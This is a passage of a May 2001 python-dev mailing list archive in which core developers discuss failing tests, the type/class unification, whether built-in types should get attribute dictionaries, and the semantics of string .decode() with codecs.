From guido@digicool.com  Thu May 10 15:02:59 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 09:02:59 -0500
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: Your message of "Wed, 09 May 2001 23:17:34 -0400."
 <15098.2126.368714.159135@slothrop.digicool.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
 <15098.2126.368714.159135@slothrop.digicool.com>
Message-ID: <200105101402.JAA01678@cj20424-a.reston1.va.home.com>

> The latest CVS build works on my Linux 2.2.12 system.  No problem with
> test_mmap.  But test_pty does fail with some complaints about FCNTL,
> which Fred just removed.  Maybe Fred is working in an alternate
> universe where test_mmap and test_pty are swapped.

Strange.  The *both* work for me with the latest CVS (and even after
removing all *.pyc files!), although last night (?) I recall seeing a
test_pty faulure too.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com (Skip Montanaro)  Thu May 10 15:16:24 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 10 May 2001 09:16:24 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
References: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com>
 <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
Message-ID: <15098.41656.128146.826459@beluga.mojam.com>

    Guido> Yes, but in the mean time the fact that it's buggy doesn't bother
    Guido> me at all.  Let it be as buggy as it always was -- that's one
    Guido> more reason to stop using it! :-)

In fact, perhaps the import warning could mention that strop is buggy and
won't be fixed... :-)

Skip


From skip@pobox.com (Skip Montanaro)  Thu May 10 15:32:15 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 10 May 2001 09:32:15 -0500
Subject: [Python-Dev] test___all__ failing on WIndows
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>
Message-ID: <15098.42607.84670.323361@beluga.mojam.com>

    >> python  ../lib/test/regrtest.py test___all__
    Tim> test___all__
    Tim> test test___all__ failed -- tty has no __all__ attribute
    Tim> 1 test failed: test___all__

grumble, grumble...

    Tim> I assume this is yet another case where some excruciatingly
    Tim> non-obvious sequence of failing imports manages to leave behind a
    Tim> damaged module object in sys.modules that prevents test___all__'s
    Tim> import of tty from getting the ImportError it *ought* to get under
    Tim> Windows (and betting termios is the ultimate culprit).

I (thankfully) gave up even pretending to run Windows recently, so I can
only make a suggestion for others who look into this problem.  Try this:
Change test___all__.check_all so that the except clause reads:

    except ImportError, msg:

then print out msg when an import fails.  You should get the actual module
that failed to import.  If foo.py consists of simply "import bar", and I
import it, I see that bar couldn't be imported:

    >>> try:
    ...   import foo
    ... except ImportError, msg:
    ...   print msg
    ... 
    No module named bar

Skip


From fdrake@acm.org  Thu May 10 15:57:59 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 10 May 2001 10:57:59 -0400 (EDT)
Subject: [Python-Dev] Re: test_mmap failing?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
Message-ID: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > But having suffered too many "impossible problems" the last 36 hours, my
 > confidence is shot <0.93 wink>.  Is test_mmap failing for anyone else under
 > current CVS?  Fred, are you *sure* it fails for you -- if so, does the
 > problem actually go away if you revert mmapmodule.c?

  It was indeed showing the behavior I described!  I figured out what
it was this morning and closed the patch again.
  The problem, of course(!), had nothing to do with mmap, before or
after any of the recent changes to mmap.  Or any old changes.  It had
a lot to do with the change I made to the socket module.  ;-)
  While figuring out the reported bug in the socket module, I created
named pipes, including one named "foo".  The mmap test opens a file
"foo" with mode "w+" in the directory in which I just happened to
create the named pipe, so it ended up with a file object opened on a
pipe -- things just don't work the same for these beasts!  Needless to
say test_mmap failed with a cryptic error message.
  This begs the question, though -- should tests that create temp
files check that the files don't already exist, and fail with a more
descriptive error if they do?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake@acm.org  Thu May 10 15:59:08 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 10 May 2001 10:59:08 -0400 (EDT)
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: <15098.2126.368714.159135@slothrop.digicool.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
 <15098.2126.368714.159135@slothrop.digicool.com>
Message-ID: <15098.44220.515660.330116@cj42289-a.reston1.va.home.com>

Jeremy Hylton writes:
 > The latest CVS build works on my Linux 2.2.12 system.  No problem with
 > test_mmap.  But test_pty does fail with some complaints about FCNTL,
 > which Fred just removed.  Maybe Fred is working in an alternate
 > universe where test_mmap and test_pty are swapped.

  Or, I could just be working in an alternate universe altogether.
I've been known to do that....


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From paulp@ActiveState.com  Thu May 10 22:55:36 2001
From: paulp@ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 14:55:36 -0700
Subject: [Python-Dev] Type/class
Message-ID: <3AFB0E58.1F0ABCA6@ActiveState.com>

-------- Original Message --------
Log Message:

Make attributes of subtypes writable, but only for dynamic subtypes
derived in Python using a class statement; static subtypes derived in
C still have read-only attributes.
-------- Original Message --------

I would like to argue that "plain old C types" should act as if they
have __dict__s for consistency with other types. It is sometimes useful
to be able to annotate objects by adding attributes to them. But this
only works with class instance objects, not instances of types.

 Paul Prescod


From jeremy@digicool.com  Thu May 10 22:59:34 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Thu, 10 May 2001 17:59:34 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <3AFB0E58.1F0ABCA6@ActiveState.com>
References: <3AFB0E58.1F0ABCA6@ActiveState.com>
Message-ID: <15099.3910.648127.25900@slothrop.digicool.com>

>>>>> "PP" == Paul Prescod <paulp@ActiveState.com> writes:

  PP> I would like to argue that "plain old C types" should act as if
  PP> they have __dict__s for consistency with other types. It is
  PP> sometimes useful to be able to annotate objects by adding
  PP> attributes to them. But this only works with class instance
  PP> objects, not instances of types.

Every type should have an __dict__ of type dict?  Then every dict
must have an __dict__, including the __dict__ of __dict__?

Once every object has an __dict__, every object will be mutable.  Then
no object will be usable as a dict key and we can get rid of dict's
entirely.

Jeremy


From fdrake@cj42289-a.reston1.va.home.com  Thu May 10 23:47:14 2001
From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake)
Date: Thu, 10 May 2001 18:47:14 -0400 (EDT)
Subject: [Python-Dev] [maintenance doc updates]
Message-ID: <20010510224714.15E4328946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/maint-docs/

Incremental update for the maintenance version docs.


From fdrake@cj42289-a.reston1.va.home.com  Fri May 11 00:04:40 2001
From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake)
Date: Thu, 10 May 2001 19:04:40 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010510230440.30DB228946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update for the development version of the docs.


From guido@digicool.com  Fri May 11 01:03:13 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 19:03:13 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 14:55:36 MST."
 <3AFB0E58.1F0ABCA6@ActiveState.com>
References: <3AFB0E58.1F0ABCA6@ActiveState.com>
Message-ID: <200105110003.TAA02924@cj20424-a.reston1.va.home.com>

Glad somebody is watching what I'm doing here -- I was afraid I was
having too much fun by myself! :-)

> -------- Original Message --------
> Log Message:
> 
> Make attributes of subtypes writable, but only for dynamic subtypes
> derived in Python using a class statement; static subtypes derived in
> C still have read-only attributes.
> -------- Original Message --------
> 
> I would like to argue that "plain old C types" should act as if they
> have __dict__s for consistency with other types.

Good point.  Plain old types currently (in the descr-branch) have a
readonly dict (using a proxy) and no settable attributes.  I will
probably give types settable attributes in a next revision, but I
prefer not to make the type's dict writable -- I need to be able to
watch the setattr calls so that if someone changes
DictType.__getitem__ I can change the mp_subscript to a C function
that calls the __getitem__ method.  For speed reasons, if you don't
override them, the C tp_slot functions carry out the operation
directly, and the __slot__ methods call the C tp_slot functions; but
when __slot__ is overridden, tp_slot must call __slot__.

> It is sometimes useful
> to be able to annotate objects by adding attributes to them. But this
> only works with class instance objects, not instances of types.
> 
>  Paul Prescod

If you're talking about *instances*: instances of subtypes of built-in
types have a dict of their own to which you can add stuff to your
heart's content.  Instances of built-in types will continue not to
have a dict (it would cost too much space if *every* object had a
dict, even if it was a NULL pointer when no attrs are defined).

If you mean you want to annotate types like you can annotate classes,
that should be possible once I implement what I describe above.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From paulp@ActiveState.com  Fri May 11 00:22:16 2001
From: paulp@ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 16:22:16 -0700
Subject: [Python-Dev] Type/class
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <15099.3910.648127.25900@slothrop.digicool.com>
Message-ID: <3AFB22A8.A0A6A4D4@ActiveState.com>

Jeremy Hylton wrote:
> 
> >>>>> "PP" == Paul Prescod <paulp@ActiveState.com> writes:
> 
>   PP> I would like to argue that "plain old C types" should act as if
>   PP> they have __dict__s for consistency with other types. It is
>   PP> sometimes useful to be able to annotate objects by adding
>   PP> attributes to them. But this only works with class instance
>   PP> objects, not instances of types.
> 
> Every type should have an __dict__ of type dict?  Then every dict
> must have an __dict__, including the __dict__ of __dict__?

What's wrong with that? Every object has a type, even type objects, and
type types. It only becomes a problem if you try to recursively walk all
the dictionaries in the system adding information to them. Otherwise
they have null pointers that "act as if" they were empty dictionaries.

> Once every object has an __dict__, every object will be mutable.  Then
> no object will be usable as a dict key and we can get rid of dict's
> entirely.

According to that argument, instances cannot be dictionary keys. That is
simply not true. Objects do not implement their hash functions in terms
of ALL of their attributes!

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From mwh@python.net  Fri May 11 00:31:53 2001
From: mwh@python.net (Michael Hudson)
Date: Fri, 11 May 2001 00:31:53 +0100 (BST)
Subject: [Python-Dev] python-dev summary 2001-04-26 - 2001-05-10
Message-ID: <Pine.LNX.4.30.0105110031170.14911-100000@localhost.localdomain>

 This is a summary of traffic on the python-dev mailing list between
 Apr 26 and May 9 (inclusive) 2001.  It is intended to inform the
 wider Python community of ongoing developments.  To comment, just
 post to python-list@python.org or comp.lang.python in the usual
 way. Give your posting a meaningful subject line, and if it's about a
 PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep
 iteration) All python-dev members are interested in seeing ideas
 discussed by the community, so don't hesitate to take a stance on a
 PEP if you have an opinion.

 This is the seventh summary written by Michael Hudson.
 Summaries are archived at:

  <http://starship.python.net/crew/mwh/summaries/>

   Posting distribution (with apologies to mbm)

   Number of articles in summary: 228

    40 |                         [|]
       |                         [|]
       |                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
    30 |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
    20 |     [|]                 [|] [|]                     [|]
       |     [|]                 [|] [|]                     [|]
       |     [|]                 [|] [|] [|]                 [|]
       |     [|]                 [|] [|] [|]             [|] [|]
       |     [|]                 [|] [|] [|]             [|] [|]
    10 |     [|]                 [|] [|] [|]         [|] [|] [|]
       |     [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
     0 +-007-024-010-001-010-010-044-023-019-010-002-012-017-039
        Thu 26| Sat 28| Mon 30| Wed 02| Fri 04| Sun 06| Tue 08|
            Fri 27  Sun 29  Tue 01  Thu 03  Sat 05  Mon 07  Wed 09

  A fairly quiet, but interesting fortnight (and I don't mean the
  sarcastic replies to the Homepage virus).  A few build problems and
  bugs fixed, and one very involved discussion (cf. most of the rest
  of this summary).


    * type == class? *

 Guido posted a message from Jim Althoff describing the metaclass
 system used in Smalltalk:

  <http://mail.python.org/pipermail/python-dev/2001-May/014508.html>

 He also mentioned a problem that is bound to bite any attempt to heal
 the type/class split in Python.  If there are to be no special cases
 in the type system then classes and types in particular should be
 instances.  This sounds innocuous, but consider:

    class MyDictType(DictType):
        def __repr__(self):
            return "MyDictType(%s)" % DictType.__repr__(self)

 The code is hoping that, as in today's Python, DictType.__repr__ will
 return an unbound method - the __repr__ method of vanilla
 dictionaries, so that output of the form

    MyDictType({1:2})

 will be given.  But DictType is now an instance, so there's another
 interpretation for DictType.__repr__ - the bound DictType's own
 __repr__ method!  This is a fundamental problem; currently
 "class.attr" and "instance.attr" have different meanings in Python,
 and any attempt to conflate the notions of "class" and "instance" is
 bound to run aground.  Guido proposed some hairy disambiguation rules
 in the above-linked message, but no-one was particularly enthused
 about them, possibly because no-one could really get their head round
 them.

 The long term solution is to change the syntax for getting - or
 removing entirely - unbound methods.  As far as anyone can make out,
 all that unbound methods are used for is called superclasses' methods
 from overriding methods, so if one can find another way of spelling
 that, then removing unbound methods entirely could be contemplated.
 So the discussion on that went around for a bit, with no really new
 compelling ideas surfacing.  There was some support for some kind of
 souped up super.foo() construct:

  <http://mail.python.org/pipermail/python-dev/2001-May/014523.html>

 To me, the most plausible ideas came from Thomas Heller:

  <http://mail.python.org/pipermail/python-dev/2001-May/014517.html>

 and from Paul Dubois, who suggested nicking the feature renaming
 feature from Eiffel:

  <http://mail.python.org/pipermail/python-dev/2001-May/014573.html>

 though the best syntax for the latter is far from clear.

 There's also the king-sized issue of backwards compatibility; to a
 first degree of approximation, *all* Python code that uses
 inheritance would need to be updated to accommodate changes in the
 meaning of "class.attribute".  Another __future__ statement, maybe?


    * data.decode *

 Marc-Andre Lemburg asked if it might be an idea if string objects
 sprouted an .decode method:

  <http://mail.python.org/pipermail/python-dev/2001-May/014547.html>

 After some umming and arring and accusations of bloat, this got BDFL
 approval, and should appear in CVS imminently.


    * Moving MacPython to sourceforge *

 Jack Jansen posted notice that he intends to move the MacPython code
 over to sourceforge:

  <http://mail.python.org/pipermail/python-dev/2001-May/014611.html>

 It will be nice to finally have all the code in the same place!

Cheers,
M.


From paulp@ActiveState.com  Fri May 11 01:26:43 2001
From: paulp@ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 17:26:43 -0700
Subject: [Python-Dev] Type/class
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com>
Message-ID: <3AFB31C3.5CEF9064@ActiveState.com>

Guido van Rossum wrote:
> 
>...
> 
> Good point.  Plain old types currently (in the descr-branch) have a
> readonly dict (using a proxy) and no settable attributes.  I will
> probably give types settable attributes in a next revision, but I
> prefer not to make the type's dict writable -- I need to be able to
> watch the setattr calls so that if someone changes
> DictType.__getitem__ I can change the mp_subscript to a C function
> that calls the __getitem__ method.  

I'm happy to have you look and see if I'm setting something magical. But
if I'm not, I would like you to just add the thing I made to an internal
private dictionary and remember it. I think that's what you are talking
about.

>...
> If you're talking about *instances*: instances of subtypes of built-in
> types have a dict of their own to which you can add stuff to your
> heart's content.  Instances of built-in types will continue not to
> have a dict (it would cost too much space if *every* object had a
> dict, even if it was a NULL pointer when no attrs are defined).

Darn. That *is* what I was hoping for.

There is an implementation that is slowish if you use it, but has little
cost if you don't: keep a big dict mapping object pointers to their
associated dictionaries (if any). For purposes of discussion, call it
sys._associations. Then have the getattr on "PyObject" look in this dict
of dicts for attributes that it can't otherwise find, and setattr
construct dictionaries in the dict of dicts if necessary.

That's the usual workaround anyhow so this would be a nicer syntax and a
more orthoganal model.

Price: a hasattr that would return false or getattr that would raise
AttributeError would be a little slower. They would have to check the
dictionary of dictionaries before deciding that they really don't have
the attribute.
-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From guido@digicool.com  Fri May 11 02:57:36 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 20:57:36 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 17:26:43 MST."
 <3AFB31C3.5CEF9064@ActiveState.com>
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com>
 <3AFB31C3.5CEF9064@ActiveState.com>
Message-ID: <200105110157.UAA03123@cj20424-a.reston1.va.home.com>

> > Good point.  Plain old types currently (in the descr-branch) have a
> > readonly dict (using a proxy) and no settable attributes.  I will
> > probably give types settable attributes in a next revision, but I
> > prefer not to make the type's dict writable -- I need to be able to
> > watch the setattr calls so that if someone changes
> > DictType.__getitem__ I can change the mp_subscript to a C function
> > that calls the __getitem__ method.  
> 
> I'm happy to have you look and see if I'm setting something magical. But
> if I'm not, I would like you to just add the thing I made to an internal
> private dictionary and remember it. I think that's what you are talking
> about.

OK, we agree on this one.

> >...
> > If you're talking about *instances*: instances of subtypes of built-in
> > types have a dict of their own to which you can add stuff to your
> > heart's content.  Instances of built-in types will continue not to
> > have a dict (it would cost too much space if *every* object had a
> > dict, even if it was a NULL pointer when no attrs are defined).
> 
> Darn. That *is* what I was hoping for.
> 
> There is an implementation that is slowish if you use it, but has little
> cost if you don't: keep a big dict mapping object pointers to their
> associated dictionaries (if any). For purposes of discussion, call it
> sys._associations. Then have the getattr on "PyObject" look in this dict
> of dicts for attributes that it can't otherwise find, and setattr
> construct dictionaries in the dict of dicts if necessary.
> 
> That's the usual workaround anyhow so this would be a nicer syntax and a
> more orthoganal model.
> 
> Price: a hasattr that would return false or getattr that would raise
> AttributeError would be a little slower. They would have to check the
> dictionary of dictionaries before deciding that they really don't have
> the attribute.

Personally, if you want this outrageous implementation, you should be
paying for it, not the infrastructure.  It feels contrary to Python's
treatment of objects.  I don't like elaborate workarounds in the
implementation like this -- probably because the performance model
becomes muddy.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg@cosc.canterbury.ac.nz  Fri May 11 02:05:11 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 11 May 2001 13:05:11 +1200 (NZST)
Subject: [Python-Dev] Type/class
In-Reply-To: <3AFB22A8.A0A6A4D4@ActiveState.com>
Message-ID: <200105110105.NAA17698@s454.cosc.canterbury.ac.nz>

Paul Prescod <paulp@ActiveState.com>:

> Otherwise
> they have null pointers that "act as if" they were empty
> dictionaries.

Actually, they need to act as if they were empty except for
a "__dict__" slot which contains another one of these magic
things. :-)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From barry@digicool.com  Fri May 11 04:45:38 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Thu, 10 May 2001 23:45:38 -0400
Subject: [Python-Dev] Interview with Mark Lutz
Message-ID: <15099.24674.311472.184935@anthem.wooz.org>

Great interview with Mark on the ORA site, linked from /.

    http://python.oreilly.com/news/python_0501.html

-Barry


From fredrik@effbot.org  Fri May 11 06:57:34 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Fri, 11 May 2001 07:57:34 +0200
Subject: [Python-Dev] Interview with Mark Lutz
References: <15099.24674.311472.184935@anthem.wooz.org>
Message-ID: <022d01c0d9eb$d3e3d680$e46940d5@hagrid>

barry wrote:

> Great interview with Mark on the ORA site, linked from /.
> 
>     http://python.oreilly.com/news/python_0501.html

you mean that python-devers read slashdot for python news,
when you have the daily url:

    http://www.pythonware.com/daily

Cheers /F


From thomas@xs4all.net  Fri May 11 10:02:26 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Fri, 11 May 2001 11:02:26 +0200
Subject: [Python-Dev] Re: test_mmap failing?
In-Reply-To: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Thu, May 10, 2001 at 10:57:59AM -0400
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com> <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>
Message-ID: <20010511110226.M16486@xs4all.nl>

On Thu, May 10, 2001 at 10:57:59AM -0400, Fred L. Drake, Jr. wrote:

[ Fred violates Tim's Rule #1 (don't ever use 'foo' for anything) and gets
  bitten in the derriere ]

>   This begs the question, though -- should tests that create temp
> files check that the files don't already exist, and fail with a more
> descriptive error if they do?

I'd think so, yes. I'd also suggest nothing uses something as lamenamed as
'foo', 'test' or 'spam' -- I'm sure Tim will agree with me, at least on the
first account :) How about mmap calls its test-testfile 'test_mmap.foo' ?

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal@lemburg.com  Fri May 11 10:34:25 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 11:34:25 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3AFBB221.F29BCB9A@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal@lemburg.com> writes:
> 
> > I've attached the patch. Due to a small reorganisation the patch is
> > a little longer -- symmetry has its price at C level too ;-)
> 
> I may be being dense, but can you explain what's going on here:
> 
> ->> u'\u00e3'.encode('latin-1')
> '\xe3'
> ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> Traceback (most recent call last):
>   File "<input>", line 1, in ?
> UnicodeError: ASCII encoding error: ordinal not in range(128)

The string.decode() method will try to reuse the Unicode
codecs here. To do this, it will have to convert the string
to Unicode first and this fails due to the character not being
in the ASCII range.

> Can you come up with some other example I can use it tomorrow's
> python-dev summary?

I will add some codecs which make the .decode() method useful
next week. The ones I have in mind are base64, hex and some of
the other binascii codecs. Also, the ROT13 codec I posted will
go into the core as simple example.

With those you will be able to write:

data.encode('base64').decode('base64')

and get back data.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik@effbot.org  Fri May 11 10:43:14 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Fri, 11 May 2001 11:43:14 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com>
Message-ID: <049801c0d9fe$cd98aef0$e46940d5@hagrid>

mal wrote:

> > I may be being dense, but can you explain what's going on here:
> > 
> > ->> u'\u00e3'.encode('latin-1')
> > '\xe3'
> > ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> > Traceback (most recent call last):
> >   File "<input>", line 1, in ?
> > UnicodeError: ASCII encoding error: ordinal not in range(128)
> 
> The string.decode() method will try to reuse the Unicode
> codecs here. To do this, it will have to convert the string
> to Unicode first and this fails due to the character not being
> in the ASCII range.

can you take that again?  shouldn't michael's example be
equivalent to:

    unicode(u"\u00e3".encode("latin-1"), "latin-1")

if not, I'd argue that your "decode" design is broken, instead
of just buggy...

Cheers /F


From mal@lemburg.com  Fri May 11 10:50:24 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 11:50:24 +0200
Subject: [Python-Dev] Interview with Mark Lutz
References: <15099.24674.311472.184935@anthem.wooz.org> <022d01c0d9eb$d3e3d680$e46940d5@hagrid>
Message-ID: <3AFBB5E0.620710C8@lemburg.com>

Fredrik Lundh wrote:
> 
> barry wrote:
> 
> > Great interview with Mark on the ORA site, linked from /.
> >
> >     http://python.oreilly.com/news/python_0501.html
> 
> you mean that python-devers read slashdot for python news,
> when you have the daily url:
> 
>     http://www.pythonware.com/daily

I just bought one of those nice machines that can run pippy
and was wondering how to get AvantGo (the channel software that
comes with it) to synchronize with your daily URL... wouldn't it
be possible to setup a channel for this ? The AvantGo channels
can be registered at their site (http://www.avantgo.com), but the
contents would have to be "mobile friendly"... anyway, just a 
thought ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Fri May 11 11:07:40 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 12:07:40 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid>
Message-ID: <3AFBB9EC.F75C158D@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > > I may be being dense, but can you explain what's going on here:
> > >
> > > ->> u'\u00e3'.encode('latin-1')
> > > '\xe3'
> > > ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> > > Traceback (most recent call last):
> > >   File "<input>", line 1, in ?
> > > UnicodeError: ASCII encoding error: ordinal not in range(128)
> >
> > The string.decode() method will try to reuse the Unicode
> > codecs here. To do this, it will have to convert the string
> > to Unicode first and this fails due to the character not being
> > in the ASCII range.
> 
> can you take that again?  shouldn't michael's example be
> equivalent to:
> 
>     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> 
> if not, I'd argue that your "decode" design is broken, instead
> of just buggy...

Well, it is sort of broken, I agree. The reason is that 
PyString_Encode() and PyString_Decode() guarantee the returned
object to be a string object. To be able to reuse Unicode codecs
I added code which converts Unicode back to a string in case the
codec return an Unicode object (which the .decode() method does).
This is what's failing.

Perhaps I should simply remove the restriction and have both
APIs return the codec's return object as-is ?! (I would be in
favour of this, but I'm not sure whether this is already in use 
by someone...)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido@digicool.com  Fri May 11 14:31:18 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 08:31:18 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 20:57:36 EST."
 <200105110157.UAA03123@cj20424-a.reston1.va.home.com>
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com>
 <200105110157.UAA03123@cj20424-a.reston1.va.home.com>
Message-ID: <200105111331.IAA04171@cj20424-a.reston1.va.home.com>

> > > Good point.  Plain old types currently (in the descr-branch) have a
> > > readonly dict (using a proxy) and no settable attributes.  I will
> > > probably give types settable attributes in a next revision, but I
> > > prefer not to make the type's dict writable -- I need to be able to
> > > watch the setattr calls so that if someone changes
> > > DictType.__getitem__ I can change the mp_subscript to a C function
> > > that calls the __getitem__ method.  

Alas, I think I'll have to withdraw this promise for now.  The truly
built-in types are static objects that are shared between all
interpreter instances within one process, and each type has only one
dictionary pointer.  So changes to the __dict__ would affect other
interpreter instances, and that's unacceptable.

I've thought about alternatives; I can't give each interpreter its own
set of types because sometimes objects are shared between interpreters
(e.g. the dictionary of interned strings), and then then their types
have to be shared too!  Not having any object sharing would mean too
much of a change to the foundations of the implementation.

I think we'll have to live with this restriction until Python 3000.
Personally, I don't mind -- I see mostly possible abuses for the
ability to change attributes of e.g. DictType or StringType. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From sdm7g@Virginia.EDU  Fri May 11 14:43:32 2001
From: sdm7g@Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 09:43:32 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <200105111331.IAA04171@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105110919490.501-100000@localhost>


Catching up on this thread -- mostly because it looks like I'm
going to have to use ExtensionClass to make pyobjc classes into
python classes rather than types -- you can add that to the 
lisp of real world uses of Don's  Metaclass hack that Tim  
questioned. 

 Reading up on MetaClasses in Smalltalk again makes me appreciate
the simplicity of a prototype system where everything is just
an object -- all objects can be cloned, and some objects are 
only used for cloning -- they are the exemplars of their type
which fill the role of Classes. 

 Unfortunately, although prototypes would be a lot simpler, it 
would be a pretty incompatible change for Python -- I can't think
of any way to get there without a lot of breakage. 

 (Still -- I wonder if there's a way they could be used under
the covers in the implementation to make it simpler. Prototype
semantics are basically a superset of Class based semantics, which
is how it was easy to do Smalltalk in Self.)

 Classes are necessary for statically typed O-O languages, but 
IMHO, make a lot less sense for dynamic languages. If Py3K were
